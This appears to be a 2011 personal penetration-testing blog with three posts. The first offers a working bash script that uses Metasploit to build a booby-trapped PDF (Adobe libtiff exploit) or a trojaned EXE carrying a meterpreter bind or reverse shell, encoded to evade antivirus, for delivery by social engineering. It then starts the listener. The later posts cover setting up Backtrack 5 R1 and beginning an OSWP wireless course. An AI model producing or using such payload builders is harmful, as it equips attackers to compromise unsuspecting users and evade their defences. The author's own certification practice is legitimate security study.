Friday, August 26, 2011

Bash Scripts

I have been practicing more Metasploit and bash scripting.  I came up with a quick script for client-side exploits.  It is not mind-blowing or anything, but it is nice for a quick file with SE.  It encodes enough to get past most AV and will start the multi handler to accept incoming/outgoing connections.  I am sure I will add to it later, but this is just a starting point.  Have to start somewhere....



#!/bin/bash
# This will create a "special" payload for you. Helps when you want to create
# Meterpreter files fast....
#
# Builds either a PDF (exploit/windows/fileformat/adobe_libtiff) or an EXE
# (msfvenom, x86/shikata_ga_nai, injected into a template) carrying a
# windows/meterpreter bind_tcp or reverse_tcp payload, then starts the matching
# exploit/multi/handler. Needs msfcli and msfvenom on the PATH.
# bash, not sh: "read -p" is used, and the old "#! /bin/sh" with
# "[ $x == y ]" breaks under dash (and on an empty answer).

PDF_DIR=/root/pdf_metasploit   # generated PDFs go here
EXE_DIR=/root/exe_template     # EXE templates the payload is injected into
OUT_DIR=/root/Desktop          # generated EXEs go here

fail() {
    echo "Did not recognize your response. Please run the script again."
    exit 1
}

# Ask for bind_tcp or reverse_tcp and the address/port that payload needs.
# bind_tcp listens on the victim, so the handler needs RHOST (the victim's IP);
# reverse_tcp calls back to us, so the payload needs LHOST (our IP).
ask_payload() {
    read -r -p "What is the $1 payload, bind_tcp or reverse_tcp? " Payload
    case "$Payload" in
        bind_tcp)
            read -r -p "What is the rhost IP address? " hostip
            read -r -p "What is the port we will bind to? " Port
            host_opt="RHOST=$hostip"
            ;;
        reverse_tcp)
            read -r -p "What is the lhost IP address? " hostip
            read -r -p "What is the port we will connect to? " Port
            host_opt="LHOST=$hostip"
            ;;
        *)
            fail
            ;;
    esac
}

# Start the handler that matches the payload we just built.
start_handler() {
    msfcli exploit/multi/handler PAYLOAD="windows/meterpreter/$Payload" \
        LPORT="$Port" "$host_opt" E
}

read -r -p "Do you need a pdf or exe 'special' payload? " special
case "$special" in
    pdf)
        echo "Remember: This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3."
        ask_payload pdf
        ls "$PDF_DIR"
        read -r -p "What name do you want to use for the PDF? " pdf_file
        msfcli exploit/windows/fileformat/adobe_libtiff FILENAME="$PDF_DIR/$pdf_file" \
            PAYLOAD="windows/meterpreter/$Payload" LPORT="$Port" "$host_opt" E
        start_handler
        ;;
    exe)
        read -r -p "Do you want the file to execute the payload in a separate process? Yes or No? " answer
        case "$answer" in
            [Yy]es) keep="-k" ;;   # -k: keep the template's own behaviour, run the payload as a new thread
            [Nn]o)  keep=""   ;;   # without -k the payload replaces the template's code
            *)      fail ;;
        esac
        ask_payload exe
        ls "$EXE_DIR"
        read -r -p "Which exe template do you want to use? " exefile
        # x86/shikata_ga_nai, 18 iterations, avoiding the NUL and space bytes;
        # output is bind.exe or reverse.exe on the Desktop, as before.
        msfvenom -p "windows/meterpreter/$Payload" -f exe -e x86/shikata_ga_nai -b '\x00\x20' -i 18 \
            LPORT="$Port" "$host_opt" $keep -x "$EXE_DIR/$exefile" > "$OUT_DIR/${Payload%_tcp}.exe"
        start_handler
        ;;
    *)
        fail
        ;;
esac
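The script hands whatever is typed at each prompt straight to msfcli and msfvenom, so a mistyped port or IP is only noticed once the handler is up on the wrong port. Here is an added example, not code from the original post, of input checks that refuse anything that is not a dotted-quad IPv4 address, a TCP port or one of the two payload names. The function names (valid_ipv4, valid_port, valid_payload, ask_until) are my own choice; it is plain POSIX sh so it also works under dash.

```shell
# Input checks for a payload-builder script like the one above.
# Added example, not part of the original post; function names are assumptions.

# 0 if $1 is exactly four decimal octets, each 0-255; 1 otherwise.
valid_ipv4() {
    case "$1" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;   # empty, non-digit, or an empty octet
    esac
    rest=$1
    n=0
    while [ -n "$rest" ]; do
        octet=${rest%%.*}                      # text before the first dot
        [ "${#octet}" -le 3 ] && [ "$octet" -le 255 ] || return 1
        case "$rest" in
            *.*) rest=${rest#*.} ;;            # drop this octet and its dot
            *)   rest='' ;;
        esac
        n=$((n + 1))
    done
    [ "$n" -eq 4 ]
}

# 0 if $1 is an integer in 1..65535; 1 otherwise.
valid_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "${#1}" -le 5 ] && [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# 0 if $1 is a payload the script knows how to build.
valid_payload() {
    case "$1" in
        bind_tcp|reverse_tcp) return 0 ;;
        *) return 1 ;;
    esac
}

# Prompt (on stderr) until the answer passes the check named in $1, then print
# the accepted answer on stdout. Returns 1 on EOF so a script cannot loop forever.
# Usage in the script:  Port=$(ask_until valid_port "What is the port we will bind to? ")
ask_until() {
    check=$1
    prompt=$2
    while :; do
        printf '%s' "$prompt" >&2
        read -r answer || return 1
        if "$check" "$answer"; then
            printf '%s\n' "$answer"
            return 0
        fi
        echo "Invalid value, try again." >&2
    done
}

# Stand-alone demonstration on constructed values (no prompting).
for v in 192.168.1.10 10.0.0.256 1.2.3 "1.2.3.4 "; do
    if valid_ipv4 "$v"; then echo "ok   IPv4: '$v'"; else echo "bad  IPv4: '$v'"; fi
done
for v in 4444 0 65536 443x; do
    if valid_port "$v"; then echo "ok   port: '$v'"; else echo "bad  port: '$v'"; fi
done
```

Dropping these three functions into the script and replacing each bare read with an ask_until call keeps the prompts the same while making sure msfcli only ever sees a well-formed IP, port and payload name.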

Monday, August 22, 2011

Backtrack 5 R1

Finished installing Backtrack 5 R1 on the laptop on the SSD drive.  Just to note, I tried.  I tried to use KDE once more and I just cannot do it.  Basket note pads is enough to make anyone who has used it switch, but it just wasn't enough.  The GUI just seems cleaner and less of a headache to use.  I am the first person to try to do something the hard way.  Trust me, ask anyone, but it just did not make any sense to me.  It should be more intuitive to use KDE and it just isn't.  I am not in the GUI all the time, but when I am, it should be an easy experience.  Why else even use the GUI in the first place?

Anyway, enough of that.  It was great that they did an update to Backtrack 5, since the DNS plugin bug was a bit of a problem.  I found out later that it was only for the x64 versions.  That is what I get for rushing to x64.  Also, it is the reason that I simply did not do the "apt-get update && apt-get upgrade && apt-get dist-upgrade".  I installed R1 pretty quickly since they have made the grub installation seamless.  It always finds my Windows installation and configures the dual-boot perfectly.  Definitely a big plus.  On to the Nvidia drivers, which was easy enough once you can keep the nouveau drivers from loading.  I used the site: "https://wiki.ubuntu.com/X/Troubleshooting/Nouveau".  I was able to CTRL+ALT+BACKSPACE and run the executable.  Sidenote, I love how easy it is to configure in Gnome: System -> Preferences -> Keyboard -> Layouts -> Options -> Key Sequence to kill the X server.  Wonderful.  Shout-out to Muts.  I like to add compiz, what can I say.  I cannot help it.  It adds an even bigger cool factor.

Next, I added the usual addons for Firefox after I upgraded it.  Added Chrome and tsclient.  I updated Wireshark to 1.7.0 and updated Metasploit 4.0 (the usual command: svn up).  However, Wireshark was a little more complicated.  I found the page "samiux.blogspot.com/2011_07_01_archive.html".  It was very helpful for the install.  Next, I installed VMware Workstation 7 on R1.  Of course, it did not work with the updated kernel on R1.  Luckily, I found the site: "weltall.heliohost.org/wordpress/2011/05/14/running-vmware-workstation-player-on-linux-2-6-39-updated/".  I was able to get VMware running in 2 seconds.  Sweet.  I know I will need that during the OSCE course.  Next, test it with the Alfa wireless adapter.  No problem there.  Next, remove the splash screen during boot-up.   Sometimes, you do not want everyone seeing a big red screen saying Backtrack 5.  Opening up VIM and editing grub.cfg took care of that.

It has been a great install on the laptop.  I am sure I will add more to this post later, but I just had to say how good Backtrack 5 R1 has been.  Every Linux install has its hiccups, but the finished product is what counts.  This is a pretty good end product when you think of what it is supposed to be used for.  It is not OS X or Windows, so you will not hear me complain.  Just saying.

Thursday, August 11, 2011

Offensive Security Wireless Professional: OSWP (Post 1)

I am not posting as much as I want on this blog, but I am still giving it a shot.  I just want to recap the past few weeks: I have been preparing for the OSCE course by using exploits from Exploit-DB and re-writing them, from fuzzing to new Python scripts to a shell prompt.  It has been a fun time.  I was able to install VMware Workstation 7 on BackTrack 5 x64 Gnome.  I have two virtual machines to work on buffer overflows, Windows XP SP2 and SP3.  I also have my desktop that has more virtual machines.  That will be essential for the OSCE course, I am sure. 

I have also been increasing my reading.  I have been reading "Ghost in the Wires", "Fuzzing", "Shellcoder's Handbook", "Metasploit: Penetration Tester's Guide" and "KingPin".  All of these books are great reads.  I have not finished "Ghost in the Wires" yet but it definitely has my attention.  Kevin Mitnick, Dave Kennedy, HD Moore and Joe McCray are probably my favorite pentesters/hackers. 

In addition, I have started another Offensive Security course: OSWP!!  I ordered the wireless adapter, ALFA AWUS036H.  I have heard good things about the adapter from the EthicalHacker.Net forum.  On the BackTrack 5 forum, there are instructions on loading the Realtek drivers for packet injection.  I am so excited.  Also, I have a Linksys WRT54G wireless access point.  I have registered for the class, but I will be paying for it tomorrow.  Hopefully, I can get the PDFs and videos over the weekend.  I will be posting reviews of the modules and the exam as I go.  Nothing too detailed of course ;-).  When I took the OSCP course, I had a great time learning and I do not expect any less from this course.  At least, this time, the exam is only 4 hours. :-).  I have been reading www.aircrack-ng.org for a while now, but never really tried out cracking WEP or WPA.  I foresee a lot of that from now on.  People still use WEP and weak pre-shared keys for WPA/WPA2.  This will increase my ability to choose a different attack vector during a penetration test.



BackTrack WiFu Online